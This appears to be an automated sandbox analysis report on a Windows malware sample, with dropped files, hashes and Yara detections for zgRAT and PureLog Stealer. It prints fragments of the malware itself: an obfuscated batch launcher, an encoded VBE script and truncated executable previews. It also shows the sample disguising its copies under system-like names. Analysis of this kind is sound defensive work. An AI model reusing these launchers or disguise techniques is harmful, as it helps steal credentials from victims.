                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                  C:\Users\user\Desktop\lAIZxBgi.log

                                                                                                  Download File
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):294912
                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                  C:\Users\user\Desktop\odsQwJqu.log

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):294912
                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                  C:\Users\user\Desktop\vomPhMaQ.log

                                                                                                  Download File
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):70144
                                                                                                  Entropy (8bit):5.909536568846014
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                  C:\Users\user\Desktop\yIzGwiSf.log

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32256
                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                  C:\Users\user\Desktop\yZRgoalJ.log

                                                                                                  Download File
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):46592
                                                                                                  Entropy (8bit):5.870612048031897
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                  C:\savesSession\4pVzEVKfbvkCEJ9qYser3z0xImhTTPHqTDWOugPvvPYsbZ7.bat

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\voed9G7p5s.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):101
                                                                                                  Entropy (8bit):5.203244062944359
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:j1ySkvAlUoLjpRDMWnxL9KIkL4Wy31TS3kq:hcAlUoLjptNmkJZS3j
                                                                                                  MD5:1EBA7659F62BB9C919655CF6F61CFED6
                                                                                                  SHA1:6429AA715B66CADE15985BC398E11662CA8170E3
                                                                                                  SHA-256:B654761DC1E242F04CAFE2BF17B7DA13CD0AD9112807601FF5681AF78D5B03BA
                                                                                                  SHA-512:E201DB8B0F6899085A1FC10189776D98D39A31590A0D2062CA08807F5C85B6106CA891615FCFE9EB454E48D4E5C28A3C3D248E0514F0E372D0A3EB2FD188E645
                                                                                                  Malicious:false
                                                                                                  Preview:%cHb%%ZMeTnwoghhYcUy%..%GsJwvtEHxlicfpt%"C:\savesSession/ComponentBrokermonitor.exe"%OWGqRLnvFKRWRGS%

                                                                                                  C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\voed9G7p5s.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):237
                                                                                                  Entropy (8bit):5.920793171672686
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:Gz2wqK+NkLzWbHhE18nZNDd3RL1wQJR6v8k9BGnWqO1:GPMCzWLy14d3XBJEUk9BwWqO1
                                                                                                  MD5:11977EA8AE3C14C4B77D75EAA2D7C5C9
                                                                                                  SHA1:7B2CEDBCB84A67F59AA2DC8F15C34D6F7B319AE6
                                                                                                  SHA-256:3B7944A7F022ED2A76B4839375BB124FB755D6DAE804715236C8C8FB028D8FF4
                                                                                                  SHA-512:8B8C9B260CE092851D16A25369372D1545D9B4FF1719A3A8918EF6A4A5F94AB88D14EA3799E8D8289AA70697AC472347B03F5FBA055465F624FBA4EB3EFD0EA4
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  Preview:#@~^1AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v%T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ/C7+k?+k/bGxJz*wjy3#n047VZA9,$ed+M&.!aqh4:KKC$Pfqr;Lh\\Kek4tGc8mYEBPZ~P6l^d+f0QAAA==^#~@.

                                                                                                  C:\savesSession\ComponentBrokermonitor.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\voed9G7p5s.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2751488
                                                                                                  Entropy (8bit):7.727823728421607
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:QAkaLFN8C62dt9FLvRza00IB4Ipg/DCDYjrMmkZHN0qmt12L:QAkaLN62H9JRza0neIpg/eEjrMmbqW2L
                                                                                                  MD5:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  SHA1:7726A5D9634749D08E43BF4871B517850D10EE65
                                                                                                  SHA-256:BFC2532FBC133EB2FBDD1C4108084CCB0478FBE6389A9830EF6D9E0E83EA4C38
                                                                                                  SHA-512:44B5DA3EF8844D6B4149058881E8888B45F5CFC52BCB81EA694BA250FF51ADA7538C6085A5F1F07254145B1998453CBD43DE8A941F1A7DB79C40D12EBF97EA9B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\savesSession\ComponentBrokermonitor.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\savesSession\ComponentBrokermonitor.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................)...........*.. ... *...@.. .......................`*...........@...................................*.K.... *.p....................@*...................................................... ............... ..H............text...4.).. ....)................. ..`.rsrc...p.... *.......).............@....reloc.......@*.......).............@..B..................*.....H.......8...........d......s:..T.*......................................0..........(.... ........8........E....N.......M...)...8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0..-....... ........8........E....*...........N...........8%......... ....~....{....:....& ....8....8.... ....~....{....:....& ....8........~....(5...~....(9... ....?d... ....~....{c...:_...& ....8T...~....(-... .... .... ....s....~....(1....... ........8

                                                                                                  C:\savesSession\cc11b995f2a76d

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):93
                                                                                                  Entropy (8bit):5.269921176513327
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:nbtMSG1nTcuAnWHZXDtFjCWM7r4GYzTx16n:nBMSOTcu9HZTtFjRM7Ci
                                                                                                  MD5:69ABFCF0FB0C024E53D3151F788C5D82
                                                                                                  SHA1:729D27974C1FFC0DB7F70F9A68FBB503ED1EA125
                                                                                                  SHA-256:16CFB2DDFBA353D5504D4F0B100BBEF4CF612348C501D9F57443D82CC0D9500D
                                                                                                  SHA-512:D3AF9D2A1D893761515454385809A4CA517B443AAA402A4F766D4801F5A98792022D1B0E1EC4166171F99EB648D38BF69F177BEFDE4D632C9922A1F1A9F983B7
                                                                                                  Malicious:false
                                                                                                  Preview:MDS5kqrKvRZvpoT1NbBhv1c7zDFB6yO0eBbe65fLmTZbruB5gahNFjTUkVFgkpN7CiRnNz5S6z4cbAPFBKffRBv4rG3k0

                                                                                                  C:\savesSession\winlogon.exe

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2751488
                                                                                                  Entropy (8bit):7.727823728421607
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:QAkaLFN8C62dt9FLvRza00IB4Ipg/DCDYjrMmkZHN0qmt12L:QAkaLN62H9JRza0neIpg/eEjrMmbqW2L
                                                                                                  MD5:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  SHA1:7726A5D9634749D08E43BF4871B517850D10EE65
                                                                                                  SHA-256:BFC2532FBC133EB2FBDD1C4108084CCB0478FBE6389A9830EF6D9E0E83EA4C38
                                                                                                  SHA-512:44B5DA3EF8844D6B4149058881E8888B45F5CFC52BCB81EA694BA250FF51ADA7538C6085A5F1F07254145B1998453CBD43DE8A941F1A7DB79C40D12EBF97EA9B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\savesSession\winlogon.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\savesSession\winlogon.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................)...........*.. ... *...@.. .......................`*...........@...................................*.K.... *.p....................@*...................................................... ............... ..H............text...4.).. ....)................. ..`.rsrc...p.... *.......).............@....reloc.......@*.......).............@..B..................*.....H.......8...........d......s:..T.*......................................0..........(.... ........8........E....N.......M...)...8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0..-....... ........8........E....*...........N...........8%......... ....~....{....:....& ....8....8.... ....~....{....:....& ....8........~....(5...~....(9... ....?d... ....~....{c...:_...& ....8T...~....(-... .... .... ....s....~....(1....... ........8

                                                                                                  \Device\Null

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\w32tm.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):151
                                                                                                  Entropy (8bit):4.7299548951916774
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:VLV993J+miJWEoJ8FXANtaSXSa0XXKvrANvj:Vx993DEUtNYXV
                                                                                                  MD5:3AADB5D26D7401515EEB860E2B40EF42
                                                                                                  SHA1:DDC12E05AB6C5CEC73E3BE175D19DE6040BDF279
                                                                                                  SHA-256:EEEB4E9EB028764EB8C0A2B7C0F68B6B9ED0FF89155B5313B0A9B04874CE34D4
                                                                                                  SHA-512:07E2E5C86D4FC040B726232D4F16684BCAC176E402CA9A1CC7E67A0133DC3F859D0BDF81C105A646CD4827BF5CD66BC041CEFEF10A63A7894355369A1C2CC6B6
                                                                                                  Malicious:false
                                                                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 31/12/2024 21:27:27..21:27:27, error: 0x80072746.21:27:32, error: 0x80072746.

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.630053256762277
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:voed9G7p5s.exe
                                                                                                  File size:2'342'562 bytes
                                                                                                  MD5:0e22e05075402fd6fc2f0a833d49c288
                                                                                                  SHA1:eb40fec691901a96a77df716902f04ddc3debf24
                                                                                                  SHA256:e232d303d7c90ed82cc677f170e466159d2ffbf3aad45a225cc545e9efb8cf07
                                                                                                  SHA512:b6acf7f3dd08255ca922ea6c943141bd68740269512ed1b48668d2933b7df95fb3516dd8b364ca41e90cfc2f637be3b32c4c8e5ee0a9da9a014a8cdfc0b2bd7b
                                                                                                  SSDEEP:49152:aBcyY62DYzvkfHuJ6Q7f0Tvg48N6XF3xTROCNaRtfB:ccylsYzvG9DZJRDNaR3
                                                                                                  TLSH:94B501D0B5F50876EC221B3726366E37D53ABE2C2A74C6CF5384A554BB631C187326A3
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                                  File Icon

                                                                                                  Icon Hash:04b06c6c6c7c1b64

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x41f530
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:1
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:1
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:1
                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  call 00007FC61CB6056Bh
                                                                                                  jmp 00007FC61CB5FE7Dh
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  mov esi, ecx
                                                                                                  call 00007FC61CB52CC7h
                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                  mov eax, ecx
                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                  ret
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  mov esi, ecx
                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                  push eax
                                                                                                  call 00007FC61CB6330Fh
                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                  pop ecx
                                                                                                  je 00007FC61CB6000Ch
                                                                                                  push 0000000Ch
                                                                                                  push esi
                                                                                                  call 00007FC61CB5F5C9h
                                                                                                  pop ecx
                                                                                                  pop ecx
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  sub esp, 0Ch
                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                  call 00007FC61CB52C42h
                                                                                                  push 0043BEF0h
                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                  push eax
                                                                                                  call 00007FC61CB62DC9h
                                                                                                  int3
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  sub esp, 0Ch
                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                  call 00007FC61CB5FF88h
                                                                                                  push 0043C0F4h
                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                  push eax
                                                                                                  call 00007FC61CB62DACh
                                                                                                  int3
                                                                                                  jmp 00007FC61CB64847h
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push 00422900h
                                                                                                  push dword ptr fs:[00000000h]

                                                                                                  Rich Headers

                                                                                                  Programming Language:
                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x5efcc.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc30000x233c.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0x640000x5efcc0x5f0009b920497ac5f6a5786e8cc2d9ea75036False0.10043688322368421data3.4827917074528IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0xc30000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  PNG0x646140xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                  PNG0x6515c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                  RT_ICON0x667080x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 3779 x 3779 px/m0.0664593011214013
                                                                                                  RT_ICON0xa87300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m0.07625990772506802
                                                                                                  RT_ICON0xb8f580x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m0.09429617383089277
                                                                                                  RT_ICON0xbd1800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.1113070539419087
                                                                                                  RT_ICON0xbf7280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.14587242026266417
                                                                                                  RT_ICON0xc07d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.25
                                                                                                  RT_DIALOG0xc0c380x286dataEnglishUnited States0.5092879256965944
                                                                                                  RT_DIALOG0xc0ec00x13adataEnglishUnited States0.60828025477707
                                                                                                  RT_DIALOG0xc0ffc0xecdataEnglishUnited States0.6991525423728814
                                                                                                  RT_DIALOG0xc10e80x12edataEnglishUnited States0.5927152317880795
                                                                                                  RT_DIALOG0xc12180x338dataEnglishUnited States0.45145631067961167
                                                                                                  RT_DIALOG0xc15500x252dataEnglishUnited States0.5757575757575758
                                                                                                  RT_STRING0xc17a40x1e2dataEnglishUnited States0.3900414937759336
                                                                                                  RT_STRING0xc19880x1ccdataEnglishUnited States0.4282608695652174
                                                                                                  RT_STRING0xc1b540x1b8dataEnglishUnited States0.45681818181818185
                                                                                                  RT_STRING0xc1d0c0x146dataEnglishUnited States0.5153374233128835
                                                                                                  RT_STRING0xc1e540x46cdataEnglishUnited States0.3454063604240283
                                                                                                  RT_STRING0xc22c00x166dataEnglishUnited States0.49162011173184356
                                                                                                  RT_STRING0xc24280x152dataEnglishUnited States0.5059171597633136
                                                                                                  RT_STRING0xc257c0x10adataEnglishUnited States0.49624060150375937
                                                                                                  RT_STRING0xc26880xbcdataEnglishUnited States0.6329787234042553
                                                                                                  RT_STRING0xc27440xd6dataEnglishUnited States0.5747663551401869
                                                                                                  RT_GROUP_ICON0xc281c0x5adata0.7666666666666667
                                                                                                  RT_MANIFEST0xc28780x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                  Imports

                                                                                                  DLLImport
